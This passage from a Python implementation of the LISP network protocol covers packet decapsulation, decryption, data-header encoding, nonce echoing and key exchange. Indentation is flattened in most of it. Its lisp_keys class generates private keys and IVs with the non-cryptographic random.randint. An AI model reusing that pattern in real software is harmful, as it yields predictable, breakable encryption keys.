self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key, addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Chacha produces plaintext in unicode for py2. Convert to raw-
# unicode-escape before proceeding. Do this in do_icv() too.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
packet = packet.encode("raw_unicode_escape")
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9:10])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6:7])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where an Info-Request is inside a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (iid not in lisp_iid_to_interface): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9:10] if self.inner_version == 4 else packet[6:7]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
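#
# Note on the offsets used above: strip_outer_headers() removes 16 bytes
# (outer UDP header plus LISP data header, 8 bytes each) plus the outer
# IP header, so 36 bytes are stripped for an IPv4 outer header and 56
# for an IPv6 outer header. The same 36/56 offsets appear in print_flow().
#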
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header(object):
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
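#
# Illustrative sketch (not called anywhere in this file): round-trip a
# LISP data header through the lisp_data_header class defined above to
# show how the N-bit/nonce and I-bit/instance-id fields are packed.
#
def lisp_example_data_header_roundtrip():
    hdr = lisp_data_header()
    hdr.nonce(0x123456)                  # sets N-bit and 24-bit nonce
    hdr.instance_id(1000)                # sets I-bit and 24-bit instance-id
    decoded = lisp_data_header()
    decoded.decode(hdr.encode())         # 8 bytes, network byte order
    return(decoded.get_nonce() == 0x123456 and
        decoded.get_instance_id() == 1000)
#enddef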
class lisp_echo_nonce(object):
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If an echo-nonce is
# stored, use the same nonce as last time regardless of whether we
# received an echo response. A set high-order bit tells the caller to
# set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long it's been since the last echo was received.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If the last received echo was a while ago and a new request-nonce
# was sent recently, say the echo happened so we can bootstrap a new
# request and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
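#
# Illustrative sketch (not called anywhere in this file): how a caller
# might consume the value returned by get_request_or_echo_nonce() above.
# A set high-order bit means "request an echo", so the E-bit is set in
# the data header; otherwise the nonce is encoded as a plain nonce. The
# header argument is assumed to be a lisp_data_header instance.
#
def lisp_example_encode_nonce_field(header, nonce):
    if (nonce & 0x80000000):
        header.request_nonce(nonce)    # sets N and E bits plus 24-bit nonce
    else:
        header.nonce(nonce)            # sets N bit plus 24-bit nonce
    #endif
    return(header)
#enddef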
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys(object):
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key.encode())
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (isinstance(key, int)): key = self.normalize_pub_key(key)
return(old_div(len(key), 2))
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
top = k[0:4].decode()
bot = k[-4::].decode()
return("0x{}...{}({})".format(top, bot, self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (isinstance(key, int)):
key = lisp_hex_string(key).zfill(256)
return(key)
#endif
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# it's a security risk to expose the shared-key (even though the
# entire key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != int): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != int): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context.encode(), data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
ek = lisp_hex_string(ek).zfill(32)
self.encrypt_key = ek.encode()
fill = 32 if self.do_poly else 40
ik = lisp_hex_string(ik).zfill(fill)
self.icv_key = ik.encode()
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
if (lisp_is_python2()):
hash_output = hexlify(hash_output.encode("raw_unicode_escape"))
else:
hash_output = hexlify(hash_output).decode()
#endif
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (addr_str not in by_rlocs):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
